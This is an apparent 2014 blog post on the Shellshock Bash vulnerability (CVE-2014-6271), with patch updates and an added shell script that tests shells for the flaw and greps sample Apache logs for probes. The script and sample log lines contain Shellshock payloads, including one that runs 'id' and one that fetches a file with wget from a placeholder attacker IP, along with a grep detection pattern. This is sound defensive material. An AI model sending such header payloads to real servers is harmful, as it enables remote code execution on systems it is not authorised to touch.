The National Vulnerability Database has published an advisory that GNU Bash through version 4.3 (in practice, every version currently in use) contains a vulnerability labeled CVE-2014-6271. The flaw lies in how Bash processes trailing strings after function definitions in the values of environment variables: when a variable's value begins with a function definition, a vulnerable Bash not only imports the function but also executes whatever command text follows the function body, while it is parsing its environment and before the script it was asked to run even starts. This permits remote attackers to execute arbitrary code through any vector that places attacker-controlled data in an environment variable before Bash runs, such as mod_cgi or mod_cgid in Apache (which export request headers as HTTP_* variables), ForceCommand in OpenSSH (which exports the client's original command as SSH_ORIGINAL_COMMAND), and others. Currently there are a few patches that fix the issue; they can be viewed and downloaded here:
Many are comparing this vulnerability to the Heartbleed bug from earlier this year in terms of seriousness and potential damage. It is crucial to patch this vulnerability as soon as possible. Some are switching their login shell to an alternative such as zsh (http://www.zsh.org/) or fish (http://fishshell.com/), but note that this does not remove Bash from the system: the bug triggers wherever Bash is invoked, including as /bin/sh on systems where /bin/sh is Bash (for example via system() from a CGI script), so only patching or removing the vulnerable Bash itself closes the hole. It is reported that Red Hat is currently testing other shells for the same flaw, and so far has been happy to report that it has not found any.
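The trailing-command behaviour described above, and the point that the bug lives in whichever Bash the server invokes rather than in the user's login shell, as an added example that is not part of the original post. It is a POSIX sh script: shellshock_check feeds a given shell binary the same shape of payload a CGI request would deliver through a header such as User-Agent and reports whether the trailing command ran; sh_is_bash reports whether /bin/sh resolves to Bash; count_shellshock_probes greps constructed (not real) Apache log lines for the "() {" marker every such probe has to carry. The function names, the CANARY token and the sample log lines are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not code from the original post or from the Bash project.
#  1. shellshock_check asks a shell binary whether it executes the command
#     that trails a function definition imported from the environment
#     (the CVE-2014-6271 behaviour).
#  2. sh_is_bash shows which shell /bin/sh really is.
#  3. count_shellshock_probes greps constructed log lines for probes.

# shellshock_check [shell]  -> prints "vulnerable", "not-vulnerable" or
# "not-found"; exit status is 1 only when the shell is vulnerable.
shellshock_check() {
    target="${1:-bash}"
    if ! command -v "$target" >/dev/null 2>&1; then
        echo "not-found"
        return 0
    fi
    # The variable value is an empty function body "() { :; }" followed by a
    # trailing command. A vulnerable bash imports the function AND runs the
    # trailing "echo CANARY" while parsing its environment, before the -c
    # script starts. A patched bash, or a shell that is not bash, never
    # prints CANARY. stderr is dropped because patched bash may warn here.
    out=$(env x='() { :; }; echo CANARY' "$target" -c 'true' 2>/dev/null)
    case "$out" in
        *CANARY*) echo "vulnerable";     return 1 ;;
        *)        echo "not-vulnerable"; return 0 ;;
    esac
}

# sh_is_bash -> "yes" if /bin/sh resolves to a bash binary, else "no".
# CGI handlers and system() run /bin/sh, not the user's login shell, so
# changing the login shell does not take bash out of the attack path.
sh_is_bash() {
    case "$(readlink -f /bin/sh 2>/dev/null)" in
        *bash*) echo "yes" ;;
        *)      echo "no"  ;;
    esac
}

# Constructed Apache combined-log lines (not real traffic): lines 1 and 3
# carry a function-definition prefix in a header field; line 2 is benign.
SAMPLE_LOG='203.0.113.7 - - [25/Sep/2014:09:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c id"
198.51.100.4 - - [25/Sep/2014:09:12:03 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Sep/2014:09:13:20 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { x;}; wget http://203.0.113.9/p" "curl/7.30"'

# scan_shellshock_probes -> echoes matching lines from stdin. "\(\)" matches
# the literal parentheses; "[{]" is a literal brace that is portable in ERE.
scan_shellshock_probes() {
    grep -E '\(\)[[:space:]]*[{]'
}

# count_shellshock_probes -> number of probe lines in SAMPLE_LOG.
count_shellshock_probes() {
    printf '%s\n' "$SAMPLE_LOG" | scan_shellshock_probes | wc -l | tr -d ' '
}

echo "bash:    $(shellshock_check bash)"
echo "/bin/sh: $(shellshock_check /bin/sh)  (is bash: $(sh_is_bash))"
echo "probe lines in sample log: $(count_shellshock_probes)"
```

Run it before and after applying a patch; a fixed Bash prints "not-vulnerable" for both lines. The variable name x is arbitrary, since Apache exports every request header as an HTTP_* variable and the name plays no part in the bug. The grep is a first-pass detection only: it matches the literal, unencoded marker and a clean result says nothing about probes that were sent in other forms.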
On a less serious note, an equally great tragedy is the lack of a catchy name like Heartbleed. I was thinking something like BashSmash?
Update 9/25/2014 9:09AM: News outlets have begun calling the vulnerability “Shell Shock”.
Update 9/25/2014 9:23AM: A patch was released on Seclists.org from Chet Ramey and can be found here: http://seclists.org/oss-sec/2014/q3/att-690/eol-pushback.patch. Please note that this is unofficial and has not been widely tested as of yet.
Update 9/25/2014 3:40PM: We’ve set up a website http://www.shellshockvuln.com to provide the latest news and information on patches, updates, and further vulnerabilities.